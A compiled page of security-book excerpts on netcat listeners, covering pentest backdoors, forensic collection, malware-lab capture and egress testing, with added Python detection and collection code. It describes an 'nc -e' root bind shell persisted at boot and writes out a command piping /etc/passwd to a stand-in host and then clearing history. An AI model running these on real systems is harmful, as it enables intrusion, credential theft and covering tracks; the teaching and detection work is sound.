Netcat Listener

Maintaining Access

Thomas Wilhelm, in Professional Penetration Testing, 2010

Netcat Shell

Figure 13.2 is a graphic representation of a shell connection using netcat. In this example, the exploited system has netcat running in listening mode. To create the communication channel, we connect from our attack system to the listening netcat application.

Figure 13.2. Netcat Shell

To use netcat as a backdoor, we need a way to direct all communication through netcat into a shell or command prompt. If we look at Figure 13.3, we see the results of an Nmap scan against the Hackerdemia server, which has numerous ports available to connect to.

Figure 13.3. Nmap Scan of Hackerdemia Server

The port we will look at for this chapter is port 1337, identified as "waste" by Nmap (a guess from its service-name table, not a fingerprint of what is actually listening). In actuality, it is netcat set to listen for an incoming connection, which then launches a shell when a connection request is received. In Figure 13.4, we see that netcat has been configured to execute a shell using the "-e" option. This shell is launched when the system boots up, because the command is in the /etc/rc.d folder. This provides assurance that our backdoor will be available even if the system is rebooted by the server's system administrator. Note that "-e" only exists in netcat builds compiled with the GAPING_SECURITY_HOLE option (Ncat offers the same thing as --exec); the OpenBSD-derived nc shipped by most current distributions does not have it.

Figure 13.4. Backdoor Using Netcat

Note

The netcat listener on the Hackerdemia LiveCD server is already installed so that we can play with it. If we wanted to create our own listener for practice purposes, that would definitely be a beneficial exercise.

When a connection is made, netcat will execute the bash shell, allowing us to interact with the system. On Linux systems (as well as Microsoft Windows), a new process inherits the permissions of whoever launched it; in our example, the bash shell will inherit the permissions of whoever started the netcat process, which was the system itself during boot. This is important to remember, because these permissions may prevent the execution of the desired application, depending on what rights the netcat process inherited. In our example, it will be running as the user "root."

Now that we know there is a netcat listener running on the system, we can use our attack server to communicate with our target. Once connected, we can begin to issue commands through the bash shell. The connection process is straightforward: we simply launch netcat to connect to 192.168.1.123 on port 1337, as seen in Figure 13.5. Notice that there are no prompts indicating success or failure; all we receive upon connection is a blank line. However, if we start typing commands, we will see that we get proper replies.

Figure 13.5. Backdoor Connection Using Netcat

To verify that we have connected to the target system (192.168.1.123), the ifconfig output is provided in Figure 13.5. Again, it is important to remember that permissions are inherited. In this case, because netcat was launched during bootup, we have root privileges, as mentioned previously and as illustrated by the whoami command. We now have a backdoor that will be accessible as long as the startup script is running. Keep in mind that a listener started this way serves a single connection: when the client disconnects, the shell exits and so does netcat, so the backdoor is gone until the next reboot unless the startup script loops or the netcat build supports a keep-listening option.

Tools and Traps…

Where Is My Command Prompt?

The absence of any prompt when using netcat to spawn a command shell is a surprise when first used and difficult to adjust to. The reason is that the shell's standard input is a socket rather than a terminal, so bash starts in non-interactive mode and never prints its PS1 prompt; the prompt is not something the remote side inherits from the target's terminal configuration. Instead, you will only see a blank line waiting for input. In the beginning, you might find yourself waiting for something to happen, only to finally realize that everything is working as it should.


URL:

https://www.sciencedirect.com/science/commodity/pii/B978159749425000018X

Incident Response

In The Official CHFI Study Guide (Test 312-49), 2007

Collecting Volatile Data

When the first responder arrives, they can attempt to collect volatile data from the powered-on machine. Volatile data is data that is only present while the machine is turned on: memory contents, running processes, and open network connections. If a network intrusion has occurred, the attacker may still have connections established. Many organizations have their own trusted toolset for collecting volatile data. Once you have collected volatile data, you should hash the files and record the hash values in your notes. All collected data must be put on forensically clean media. The netcat tool is often used to collect volatile data over a network.

Responder Computer: Setting up Netcat Listener

Starting on the incident responder's collection computer, we first start a Netcat listener. The first command sets up a Netcat listener on TCP port 4444. Data received will be redirected to a file on forensically clean media attached to the responder's system.

Victim Computer: Sending Volatile Data with Netcat

The next command is issued from the victim computer. This step pipes the Internet Protocol (IP) configuration data (the output of ipconfig) into a Netcat connection to port 4444 on the first responder's workstation.

Responder Computer: Verifying and Hashing

Next we verify and then hash the data. The type command is used to verify the results from the Netcat transfer, and md5deep is used to hash the data. The type command is also used to verify the hash value. It is important to redirect the hash output to a new file rather than over the evidence itself. In the case below, ipconfig.txt was hashed and the results were redirected to ipconfig.md5. (MD5 still detects accidental corruption, but because chosen-prefix collisions against it are practical, record a SHA-256 digest alongside it if integrity may later be contested.)

Automated Volatile Data Collection Tools

Automated incident response scripts offer a speed advantage over manually typing in commands. Many organizations have a custom software tool belt for incident response. Many of the tools incorporate static binaries, which are compiled to be totally self-contained when operating. Static binaries are preferred because they do not load shared libraries from the suspect system, and therefore tend not to trample on evidence or trust code the attacker may have replaced. There are many tools, such as e-fense's live CD Helix, that an organization may employ as an incident response tool to collect volatile data (see Figure 15.10).

Figure 15.10. e-fense's Helix Incident Response CD


URL:

https://www.sciencedirect.com/science/article/pii/B978159749197650016X

Analysis of a Malware Specimen

Cameron H. Malin, ... James M. Aquilina, in Malware Forensics Field Guide for Linux Systems, 2014

Using a Netcat Listener

▸ An alternative method that can be used to intercept the contents of Web requests and other network connections is to establish a netcat listener on a different host in the laboratory network.

Recall from previous chapters that netcat is a powerful networking utility that reads and writes data across network connections over TCP/IP or User Datagram Protocol (UDP). 66

This is particularly helpful for establishing a network listener on arbitrary TCP and UDP ports that a suspect program uses to connect. netcat is a favorite tool among many digital investigators due to its flexibility and variety of use, and because it is often natively installed on many Linux distributions. There is also a Windows port available for download. 67

Upon learning the remote port the suspect program is requesting to connect to, the digital investigator can use netcat by establishing a netcat listener on the target port of the Linux server host in the malware laboratory.

Using the example in Figure 6.25, the suspect program is requesting to download files from a Web server over port 80; to establish a netcat listener on port 80 of the Linux server, use the nc command with the -v (verbose), -l (listen) and -p (port) switches and specify the target port number, that is, nc -v -l -p 80, run as root because port 80 is privileged. (The -v switch is not required and simply provides more verbose output, as shown below in Figure 6.26. Note that the OpenBSD-derived nc common on current distributions takes the listening port as a positional argument, nc -vl 80, and uses -p for the source port instead.)

Figure 6.26. Establishing a netcat listener for the purpose of collecting network impression evidence


URL:

https://www.sciencedirect.com/science/article/pii/B9781597494700000061

Netcat Penetration Testing Features

In Netcat Power Tools, 2008

System B - The System on the Outside of the Firewall

The role of System B is to listen on any and all ports for incoming connections and, if one is received, send a response packet back to our internal system. To determine what TCP and UDP ports we can connect to, we want to configure our external system to listen on all 65,535 TCP and UDP ports.

It is not realistic to open 131,070 ports using separate Netcat listeners. Instead, we can configure Netcat to listen on two ports, one for TCP connections and the other for UDP connections. We can then use our own packet-filtering device to essentially port forward all TCP connections to our TCP Netcat listener, and all UDP traffic to our UDP Netcat listener.

For this example, System B is running Gentoo Linux configured to use Iptables, which will perform our port forwarding function. The TCP Netcat listener is configured to accept connections on TCP/1234, and the UDP listener will accept connections on UDP/1234.

Note

For information regarding the installation and kernel configuration required to run Iptables on the Gentoo Linux platform, reference the following link: http://gentoo-wiki.com/HOWTO_Iptables_for_newbies

For general information on Iptables you can also visit http://www.netfilter.org/.

After System B is configured to use Iptables, we need to add some rules to redirect the incoming traffic to the appropriate Netcat listeners. To implement this function we will use the following Iptables commands:

iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 1:65535 -j REDIRECT --to-port 1234

iptables -t nat -A PREROUTING -i eth0 -p udp --dport 1:65535 -j REDIRECT --to-port 1234

To verify the rules are loaded into Iptables, type the following command:

iptables -L -n -t nat

Figure 2.5. Lists the Iptables Rules

Once Iptables is configured properly, we can start our two Netcat listeners using the following commands in separate terminals.

nc -l -p 1234

nc -u -l -p 1234

At this point, System B is set up and ready to accept connections on all 65,535 TCP ports and all 65,535 UDP ports, and we can set up the system on the internal network (System A). Two caveats apply. Because REDIRECT rewrites the destination port, the listener sees every probe arrive on 1234 and cannot tell which port System A originally tried, so record the probed port on System A (or read it back on B with the SO_ORIGINAL_DST socket option). And the traditional nc shown above exits once its first client disconnects, so either restart it in a loop or use a build with a keep-listening option (-k in OpenBSD nc and in Ncat) to test more than one port per run.
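The System A side of this check, written as an added Python example rather than the book's own setup: System B is modelled by one TCP and one UDP listener that answer every probe with a banner (standing in for the two nc listeners behind the REDIRECT rules), and the probing code records results by the port it tried, since the redirected listener cannot see that port. Everything runs on the loopback interface with kernel-chosen ports; the function names, the banner text and the "open/closed/filtered/no-reply" labels are this example's own, and a real run would point the probes at System B's address with the firewall in between.

```python
"""Outbound-port (egress) check modelled on the System A / System B setup.

Added example, not from the book. Loopback only; ports are kernel-chosen.
"""
import socket
import threading


def start_system_b(stop):
    """Two listeners on 127.0.0.1 that reply with a banner (the 'response packet').

    They model the TCP and UDP nc listeners on System B. Returns (tcp_port, udp_port).
    """
    tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    tcp.bind(("127.0.0.1", 0))
    tcp.listen(16)
    tcp.settimeout(0.2)  # short timeout so the loop can notice `stop`
    udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    udp.bind(("127.0.0.1", 0))
    udp.settimeout(0.2)

    def tcp_loop():
        while not stop.is_set():
            try:
                conn, _addr = tcp.accept()
            except socket.timeout:
                continue
            with conn:
                conn.settimeout(2.0)
                conn.sendall(b"SYSTEM-B tcp listener\n")
        tcp.close()

    def udp_loop():
        while not stop.is_set():
            try:
                _data, addr = udp.recvfrom(512)
            except socket.timeout:
                continue
            udp.sendto(b"SYSTEM-B udp listener\n", addr)  # UDP needs an explicit reply
        udp.close()

    threading.Thread(target=tcp_loop, daemon=True).start()
    threading.Thread(target=udp_loop, daemon=True).start()
    return tcp.getsockname()[1], udp.getsockname()[1]


def probe_tcp(host, port, timeout=1.0):
    """'open' if the handshake completed, 'closed' on RST, 'filtered' on silence."""
    try:
        c = socket.create_connection((host, port), timeout=timeout)
    except ConnectionRefusedError:
        return "closed"      # RST came back: reachable, nothing listening
    except (socket.timeout, OSError):
        return "filtered"    # neither SYN/ACK nor RST: a firewall dropped it
    with c:
        try:
            c.recv(64)       # consume System B's banner if it sends one
        except socket.timeout:
            pass
        return "open"


def probe_udp(host, port, timeout=1.0):
    """UDP has no handshake: only a reply proves the datagram reached System B."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.connect((host, port))  # connected UDP socket: ICMP errors surface as exceptions
        try:
            s.send(b"probe")
            return "open" if s.recv(64) else "no-reply"
        except ConnectionRefusedError:
            return "closed"      # ICMP port unreachable came back
        except socket.timeout:
            return "no-reply"    # filtered, or the reply itself was dropped


def egress_check(host, tcp_ports, udp_ports):
    """Probe each port and key the result by the port we tried (B cannot see it)."""
    return {"tcp": {p: probe_tcp(host, p) for p in tcp_ports},
            "udp": {p: probe_udp(host, p) for p in udp_ports}}


def free_port(kind):
    """Pick a port nothing listens on, to demonstrate the 'closed' outcome."""
    with socket.socket(socket.AF_INET, kind) as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


def demo():
    stop = threading.Event()
    tcp_open, udp_open = start_system_b(stop)
    tcp_closed, udp_closed = free_port(socket.SOCK_STREAM), free_port(socket.SOCK_DGRAM)
    try:
        result = egress_check("127.0.0.1", [tcp_open, tcp_closed], [udp_open, udp_closed])
    finally:
        stop.set()
    return {"tcp_open": tcp_open, "tcp_closed": tcp_closed,
            "udp_open": udp_open, "udp_closed": udp_closed, "result": result}


if __name__ == "__main__":
    print(demo())
```

Against a real System B, replace 127.0.0.1 with its address and pass the full port ranges; the "filtered" and "no-reply" outcomes are the interesting ones, since they are the ports the firewall between A and B is blocking.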


URL:

https://www.sciencedirect.com/science/article/pii/B9781597492577000029

Analysis of a Suspect Program

James M. Aquilina , in Malware Forensics, 2008

Using a Netcat Listener

Although we set up a Web server to facilitate the environment required by the suspect program, an alternative method that can be used to intercept the contents of Web requests and other network connections is to establish a netcat listener on a different host in the laboratory network. Recall from previous chapters that netcat is a powerful networking utility that reads and writes data across network connections over TCP/IP or User Datagram Protocol (UDP). 43 This is especially helpful for establishing a network listener on arbitrary TCP and UDP ports that a suspect program uses to connect. Netcat is a favorite tool among many digital investigators, due to its flexibility and variety of use, and because it is often natively installed on many Linux distributions. Windows users, have no fear: there is also a Windows port available for download. 44

In this instance, because we know that the suspect program is requesting to download files from a Web server over port 80, we can establish the listener on port 80 of our "remote" host in the malware lab. To listen on port 80, use the nc command with the -v (verbose), -l (listen) and -p (port) switches. (The -v switch is not required and simply provides more verbose output, as shown below in Figure 9.18.)

Figure 9.18. Establishing a Netcat Listener to Intercept Web Requests Made by the Specimen

During the course of runtime, our suspect program also makes a similar request to resolve a domain name relating to an online free Web-based e-mail service, which, after being resolved, it contacts as a mail server. However, after providing the specimen with a mail server (netcat can also be used for this purpose by establishing a listener on port 25), the captured contents are minimal and simply consist of a connection and reset. With no payload or additional details, it is difficult to decipher the purpose of the requested connection (see Figure 9.19). One possibility worth ruling out is that the specimen behaves like any SMTP client and waits for the server's "220" greeting before sending anything, which a bare netcat listener never provides; feeding the listener a canned greeting is the obvious next step.

Figure 9.19. Mail Server Requests Made by the Specimen
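A capture listener in the spirit of nc -v -l -p 80 and the port-25 variant, for this excerpt and for the Field Guide excerpt earlier on this page, as an added Python example that is not from either book: it logs the peer the way -v does, keeps the raw bytes, parses an HTTP request line and headers when it sees them, and reports a connection that carried no payload (the "connection and reset" outcome of Figure 9.19) explicitly rather than as an empty file. The specimen is a constructed client on the loopback interface; the host name and path it requests are invented, and capture_listener, parse_capture and fake_specimen are this example's own names.

```python
"""Netcat-style capture of what a suspect program sends to a port.

Added example, not from either book. Loopback only; the "specimen" is a
constructed client and the URL it asks for is invented.
"""
import socket
import threading


def capture_listener(expected_connections, timeout=10.0):
    """Accept N connections on 127.0.0.1:<ephemeral>; return (port, records, done).

    Like a bare `nc -l`, it never sends anything back. That matters for
    protocols where the server speaks first (SMTP): such a client shows up
    here as a connection with zero bytes.
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    port = srv.getsockname()[1]
    records = []
    done = threading.Event()

    def serve():
        for _ in range(expected_connections):
            conn, peer = srv.accept()          # what `-v` prints as "connect to ... from ..."
            conn.settimeout(timeout)
            raw = b""
            with conn:
                try:
                    while True:
                        data = conn.recv(4096)
                        if not data:
                            break              # client closed: end of capture
                        raw += data
                        if b"\r\n\r\n" in raw:
                            break              # complete HTTP header block seen
                except (socket.timeout, ConnectionResetError):
                    pass                       # treat a reset like a close
            records.append(parse_capture(peer, raw))
        srv.close()
        done.set()

    threading.Thread(target=serve, daemon=True).start()
    return port, records, done


def parse_capture(peer, raw):
    """Turn captured bytes into a record, marking an empty capture explicitly."""
    rec = {"peer": f"{peer[0]}:{peer[1]}", "bytes": len(raw),
           "request_line": None, "headers": {}}
    if not raw:
        rec["note"] = "connection with no payload (client hung up or waited for us to speak)"
        return rec
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    rec["request_line"] = lines[0]
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            rec["headers"][name.strip()] = value.strip()
    return rec


def fake_specimen(port, payload):
    """Constructed stand-in for the suspect program: connect, send, hang up."""
    with socket.create_connection(("127.0.0.1", port)) as c:
        if payload:
            c.sendall(payload)


def demo():
    port, records, done = capture_listener(expected_connections=2)
    # 1) the download request the specimen makes (Figure 9.18 scenario)
    fake_specimen(port, b"GET /update/bot.bin HTTP/1.1\r\n"
                        b"Host: update.example.invalid\r\n"
                        b"User-Agent: Mozilla/4.0\r\n\r\n")
    # 2) the "mail server" contact that yields only a connection and reset (Figure 9.19)
    fake_specimen(port, b"")
    done.wait(timeout=10)
    return records


if __name__ == "__main__":
    for rec in demo():
        print(rec)
```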


URL:

https://www.sciencedirect.com/science/article/pii/B9781597492683000098

The Dark Side of Netcat

In Netcat Ability Tools, 2008

Netcat on Windows

All of the examples I have given here have been within the Linux operating system. For those who are attacking systems that use one of Microsoft's Windows operating systems, either as a target or attack platform, all the techniques in here will be identical with one very useful difference: the -L option. When you use this flag ("listen harder"), netcat re-opens the listener after each client disconnects, so you retain access to the netcat listener even after you have disconnected from the compromised system. This is beneficial, since it eliminates the additional system modifications or scripts needed to keep netcat alive, as required on Linux.

There is a downside to this, though. If you need to hide netcat by renaming it to something more common, you stand out more when you use flags not normally associated with whatever application you are trying to disguise yourself as. This is a minor irritant, though, and rarely something that would be much of a concern. Otherwise, this chapter can apply the examples interchangeably with the Windows version of netcat.


URL:

https://www.sciencedirect.com/science/article/pii/B9781597492577000054

Local System Attacks

Thomas Wilhelm, in Professional Penetration Testing (Second Edition), 2013

Netcat Shell

Figure 9.18 is a graphic representation of a shell connection using netcat. In this example, the exploited system has netcat running in listening mode. To create the communication channel, we connect from our attack system to the listening netcat application.

Figure 9.18. Netcat shell.

To use netcat as a backdoor, we need a way to direct all communication through netcat into a shell or command prompt. If we look at Figure 9.19, we see the results of an Nmap scan against the Hackerdemia server, which has numerous ports available to connect to.

Figure 9.19. Nmap scan of Hackerdemia server.

The port we will look at for this chapter is port 1337, identified as "waste" by Nmap. In actuality, it is netcat set to listen for an incoming connection, which then launches a shell when a connection request is received. In Figure 9.20, we see that netcat has been configured to execute a shell using the "-e" option. This shell is launched when the system boots up, because the command is in the /etc/rc.d folder. This provides assurance that our backdoor will be available even if the system is rebooted by the server's system administrator.

Figure 9.20. Backdoor using netcat.

Note

The netcat listener on the Hackerdemia LiveCD server is already installed so that we can play with it. If we wanted to create our own listener for practice purposes, that would definitely be a beneficial exercise.

When a connection is made, netcat will execute the bash shell, allowing us to interact with the system. On Linux systems (as well as Microsoft Windows), a new process inherits the permissions of whoever launched it; in our example, the bash shell will inherit the permissions of whoever started the netcat process, which was the system itself during boot. This is important to remember because these permissions may prevent the execution of the desired application, depending on what rights the netcat process inherited. In our example, it will be running as the user "root."

Now that we know there is a netcat listener running on the system, we can use our attack server to communicate with our target. Once connected, we can begin to issue commands through the bash shell. The connection process is straightforward: we simply launch netcat to connect to 192.168.1.123 on port 1337, as seen in Figure 9.21. Notice that there are no prompts indicating success or failure; all we receive upon connection is a blank line. However, if we start typing commands, we will see that we get proper replies.

Figure 9.21. Backdoor connection using netcat.

To verify that we have connected to the target system (192.168.1.123), the ifconfig output is provided in Figure 9.21. Again, it is important to remember that permissions are inherited. In this case, because netcat was launched during bootup, we have root privileges, as mentioned earlier and as illustrated by the whoami command. We now have a backdoor that will be accessible as long as the startup script is running.

Tools and Traps

Where Is My Command Prompt?

The absence of any prompt when using netcat to spawn a command shell is a surprise when first used and hard to adapt to. The reason is that the shell's standard input is a socket rather than a terminal, so bash starts in non-interactive mode and never prints its PS1 prompt; the prompt is not something the remote side inherits from the target's terminal configuration. Instead, you will only see a blank line waiting for input. In the beginning, you might find yourself waiting for something to happen, only to finally realize that everything is working as it should.


URL:

https://www.sciencedirect.com/science/article/pii/B9781597499934000094

Malware Incident Response

Cameron H. Malin, ... James M. Aquilina, in Malware Forensics Field Guide for Linux Systems, 2014

Local vs. Remote Collection

Choose the manner in which you will collect data from the subject system.

Collecting results locally means you are connecting external storage media to the subject system and saving the results to the connected media.

Remote collection means that you are establishing a network connection, typically with a netcat or cryptcat listener, and transferring the acquired system data over the network to a collection server. This method reduces interaction with the subject system but relies on the ability to traverse the subject network through the ports used by the netcat listener. Plain netcat sends everything in the clear and authenticates nobody, so anything on the path can read or alter the evidence; cryptcat adds a shared-secret cipher, and an SSH tunnel is the more defensible choice where one is available.

Additional remote forensic utilities such as F-Response and FTK have some capabilities to support volatile data collection and are discussed in the Tool Box Appendix.

Investigative Considerations

In some instances, the subject network will have a rigid firewall and/or proxy server configuration, making it cumbersome or impractical to establish a remote collection repository.

Remotely acquiring certain data during live response, like imaging a subject system's physical memory, may be time- and resource-consuming and require several gigabytes of data to traverse the network, depending on the amount of random access memory (RAM) in the target system. The pair of commands depicted in Figure 1.1 sends the output of a live response utility acquiring data from a subject system to a remote IP address (172.16.131.32) and saves the output in a file named "<toolname>20131023host1.txt" on the collection system.

Figure 1.1. Netcat commands to establish a network listener to collect tool output remotely

The netcat listener must be started on the collection system first, so that it is ready and waiting to receive data from the subject system; a client that connects before the listener is up simply fails, and the tool's output is lost.

Local collection efforts can be protracted in instances where a victim system is older and contains obsolete hardware, such as USB 1.1, which has a maximum transfer rate of 12 megabits per second (Mbps).

Always ensure that the media you are using to acquire live response data are pristine and do not contain unrelated case data, malicious code specimens, or other artifacts from previous investigations. Acquiring digital evidence on "dirty" or compromised media can taint and undermine the forensic soundness of the acquired data.
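The listener-then-sender pair of Figure 1.1, together with the three-step sequence (listener, send, verify and hash) from The Official CHFI Study Guide excerpt earlier on this page, carried through as an added Python example that is not from either book. It spools whatever arrives on the collection port to a file, pipes a tool's output into the connection from the subject side, writes the digests to a separate file beside the evidence rather than over it, and re-checks them after a simulated post-collection modification. It runs on the loopback interface; the tool is a constructed stand-in for ipconfig, and the file name and function names are this example's own.

```python
"""Remote volatile-data collection over a netcat-style channel, with hashing.

Added example, not from either book. Models, on the loopback interface:
  collection system:  nc -l -p PORT > <toolname>20131023host1.txt
  subject system:     <toolname> | nc COLLECTOR PORT
  collection system:  md5deep <file> > <file>.md5 ; type <file>.md5
"""
import hashlib
import os
import socket
import subprocess
import sys
import tempfile
import threading


def start_collector(out_path):
    """`nc -l -p PORT > out_path`: accept one connection, spool its bytes to disk.

    Returns (port, done_event); the event fires when the sender disconnects.
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))  # ephemeral port here; the CHFI text uses 4444
    srv.listen(1)
    port = srv.getsockname()[1]
    done = threading.Event()

    def serve_one():
        conn, _peer = srv.accept()
        with conn, open(out_path, "wb") as evidence:
            while True:
                data = conn.recv(65536)
                if not data:
                    break
                evidence.write(data)
        srv.close()
        done.set()

    threading.Thread(target=serve_one, daemon=True).start()
    return port, done


def send_tool_output(argv, port):
    """`tool | nc COLLECTOR PORT`: stream a command's stdout into the collector."""
    proc = subprocess.Popen(argv, stdout=subprocess.PIPE)
    with socket.create_connection(("127.0.0.1", port)) as c:
        for chunk in iter(lambda: proc.stdout.read(65536), b""):
            c.sendall(chunk)
        c.shutdown(socket.SHUT_WR)  # EOF tells the listener the transfer is complete
    return proc.wait()


def hash_and_record(path, algorithms=("md5", "sha256")):
    """md5deep-style: digest the evidence file and write <path>.<alg> beside it.

    The digest goes to a new file, never over the evidence. sha256 is kept
    alongside md5 because md5 collisions are practical.
    """
    with open(path, "rb") as f:
        data = f.read()
    digests = {}
    for alg in algorithms:
        digests[alg] = hashlib.new(alg, data).hexdigest()
        with open(f"{path}.{alg}", "w") as rec:
            rec.write(f"{digests[alg]}  {os.path.basename(path)}\n")
    return digests


def verify_recorded(path, alg="sha256"):
    """Re-hash the file and compare with the recorded digest (what `type` shows)."""
    with open(f"{path}.{alg}") as rec:
        recorded = rec.read().split()[0]
    with open(path, "rb") as f:
        return hashlib.new(alg, f.read()).hexdigest() == recorded


# Constructed stand-in for ipconfig / a live-response tool (prints a fake interface line).
FAKE_TOOL = [sys.executable, "-c", "print('eth0: 192.168.1.50  mask 255.255.255.0')"]


def demo():
    """Run the three steps end to end, then show that a later change is detected."""
    workdir = tempfile.mkdtemp(prefix="collect-")
    evidence = os.path.join(workdir, "ipconfig20131023host1.txt")
    port, done = start_collector(evidence)      # collection system first
    send_tool_output(FAKE_TOOL, port)           # then the subject system
    done.wait(timeout=10)
    with open(evidence, "rb") as f:
        collected = f.read()
    digests = hash_and_record(evidence)
    intact = verify_recorded(evidence)
    with open(evidence, "ab") as f:             # simulate a post-collection change
        f.write(b"x")
    return {"collected": collected, "digests": digests,
            "verified": intact, "tamper_detected": not verify_recorded(evidence)}


if __name__ == "__main__":
    print(demo())
```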


URL:

https://www.sciencedirect.com/science/article/pii/B9781597494700000012

Understanding the Methods and Mindset of the Attacker

Dale Liu , in Cisco Router and Switch Forensics, 2009

Netcat

If you are a computer utility or tool hound, you need to make sure you have netcat (also referred to as nc) as part of your tool set if you don't have it already. Netcat is a popular open source tool that is used primarily to read and write data over a network easily. It can also be used by naughty hackers to gain access to systems, or to set themselves up as "listeners."

Although netcat can be used as a listener, it is important to know that its capability extends beyond this feature. It can also be used to move files and it can operate as a network scanner through a simple choice of switches and flags. In this section, I will demonstrate its use as a connection tool.

Netcat is used in several ways, but mainly it is used as a transmitting process to make a connection as a client, or as a listener, like a mini server of sorts. Indeed, netcat is very versatile and will permit data to be piped into and out of it. For instance, if I were going to set up a netcat listener on my computer to retrieve data that I knew would be coming to me from my evil twin, I would invoke netcat in the following way:

#netcat -l -p 8888 > ~/stolen_passwords.txt

This would allow my computer to listen for network traffic on port 8888 and redirect whatever arrives into the file (which I have planned will be a password list coming from my evil twin). On the other hand, say that my evil twin has penetrated the physical barriers of his target and, using his leet Ninja skills, got into the network data center facility and ran the following on the UNIX server:

#cat /etc/passwd | netcat site.goodytwoshoes.net 8888 && history -c

As you can see, my twin is really evil: he entered a command to list the contents of the UNIX password file from the /etc folder, and piped the output into the netcat program, which connects to the same port I am running on my listener system (the destination port is given positionally; in classic netcat, -p on the client side sets the local source port instead). When the command executes successfully, he will wipe out all recent commands from the command execution history, which is a subject we will get into later.

In Figure 7.3, you can see a variation of my command set as a listener on the system, where I refer to the localhost (as in 127.0.0.1); when a connection is made, a shell is passed to whomever connects to it. Toward the bottom of the figure, you can see the report stating that it is listening on port 8888, and the ps -aux report stating that this process is running with a process identification number (PID) of 4203. In addition, I brought up lsof -ni to "list open files, Internet-related, in numerical form," and you can see the port it is listening on even if you did not know whether the original command was running.

Figure 7.3. Netcat Running in the Background

It should be clear from this screen that a netcat process was running after we executed ps -aux | grep nc. You should also get a scare from the listening open file in the lsof -ni output, as it shows a port that is open and that belongs to the netcat process, with a PID of 4203. Also remember that not all hacker tools are named "netcat" or "nc." (Especially remember that not all flavors of UNIX will have the process list command ps with an -aux switch or lsof -ni; check your man page for specifics.)

This kind of thing happens every day on thousands of computers around the globe. Some programs out there are based on the functionality of netcat and have been configured in a number of ways ranging from keystroke recording to full-on data exfiltration. At this point, you should be thinking of two things. The first concerns some of the malicious tactics people will use to exploit computers and defeat information security. The second concerns the sources of data you can access to determine why a computer is "acting funny." A really brilliant guy I worked with awhile ago said that there isn't a "Get Easy button"; that means you need to remember the points we covered in the section, summarized as follows:

Use tools that list the running (or otherwise) processes.

Determine what network ports are in a listening or transmitting state.

Understand what is considered a normal condition on the systems you supervise so that you can easily determine whether something is truly out of the ordinary.
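Those three points turned into a small detector, as an added Python example that is not from the book: it parses ps aux and lsof -ni output, joins sockets to processes on PID, and flags listeners that are a known netcat binary, carry a shell-spawning -e on their command line, or simply are not in a baseline of what the host is supposed to expose. The listings are constructed sample lines in the real tools' column layout, with invented PIDs, paths and ports; the renamed copy at /tmp/.x/httpd is there to show that matching on the name "nc" alone would miss it, while the baseline and the command line do not.

```python
"""Spot a netcat-style listener from `ps aux` and `lsof -ni` output.

Added example, not from the book. Sample listings below are constructed.
"""
import re

PS_AUX = """\
USER   PID %CPU %MEM    VSZ   RSS TTY   STAT START TIME COMMAND
root   812  0.0  0.1  72000  6000 ?     Ss   10:01 0:00 /usr/sbin/sshd -D
www   2210  0.0  0.3 120000 20000 ?     S    10:02 0:00 /usr/sbin/httpd -k start
root  4203  0.0  0.0   4500   800 pts/1 S    10:15 0:00 nc -l -p 8888 -e /bin/bash
www   4310  0.0  0.0   4500   800 ?     S    10:16 0:00 /tmp/.x/httpd -l -p 9090 -e /bin/sh
"""

LSOF_NI = """\
COMMAND   PID USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
sshd      812 root    3u  IPv4  12345      0t0  TCP *:22 (LISTEN)
httpd    2210 www     4u  IPv4  22222      0t0  TCP *:80 (LISTEN)
nc       4203 root    3u  IPv4  23456      0t0  TCP 127.0.0.1:8888 (LISTEN)
httpd    4310 www     4u  IPv4  34567      0t0  TCP *:9090 (LISTEN)
"""

# What this host is supposed to expose (proto, port, binary); anything else gets a look.
BASELINE_LISTENERS = {("TCP", 22, "/usr/sbin/sshd"), ("TCP", 80, "/usr/sbin/httpd")}
NETCAT_NAMES = {"nc", "netcat", "ncat", "cryptcat", "nc.traditional", "nc.openbsd"}
# `-e /bin/sh`, `-e /bin/bash`, `-e cmd.exe`: a listener that hands out a shell.
SHELL_EXEC_RE = re.compile(r"\s-e\s+\S*(sh|cmd\.exe)(\s|$)")


def parse_ps_aux(text):
    """pid -> (user, argv). COMMAND is the 11th column and may contain spaces."""
    procs = {}
    for line in text.splitlines()[1:]:
        fields = line.split(None, 10)
        if len(fields) == 11:
            procs[int(fields[1])] = (fields[0], fields[10])
    return procs


def parse_lsof_listeners(text):
    """Return (proto, port, pid) for TCP sockets in LISTEN state and all UDP sockets."""
    listeners = []
    for line in text.splitlines()[1:]:
        f = line.split()
        if len(f) < 9 or f[7] not in ("TCP", "UDP") or "->" in f[8]:
            continue  # not an inet socket, or an established connection
        state = f[9].strip("()") if len(f) > 9 else ""
        if f[7] == "UDP" or state == "LISTEN":
            listeners.append((f[7], int(f[8].rsplit(":", 1)[1]), int(f[1])))
    return listeners


def find_suspicious_listeners(ps_text, lsof_text, baseline=BASELINE_LISTENERS):
    """Join sockets to processes and explain why each unexpected listener is flagged."""
    procs = parse_ps_aux(ps_text)
    findings = []
    for proto, port, pid in parse_lsof_listeners(lsof_text):
        user, argv = procs.get(pid, ("?", ""))
        binary = argv.split()[0] if argv else ""
        reasons = []
        if (proto, port, binary) not in baseline:
            reasons.append("listener not in baseline")
        if binary.rsplit("/", 1)[-1] in NETCAT_NAMES:
            reasons.append("known netcat binary")
        if SHELL_EXEC_RE.search(argv):
            reasons.append("command line spawns a shell on connect")
        if reasons:
            findings.append({"pid": pid, "user": user, "proto": proto,
                             "port": port, "argv": argv, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in find_suspicious_listeners(PS_AUX, LSOF_NI):
        print(finding)
```

On a live system, feed it the real output (`ps aux` and `lsof -ni`, or `ss -lntup` where lsof is absent) and keep the baseline per host role; the baseline check is what catches the renamed binary, which is the case the section warns about.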


URL:

https://www.sciencedirect.com/science/article/pii/B9781597494182000077

Reporting Results

Thomas Wilhelm , in Professional Penetration Testing, 2010

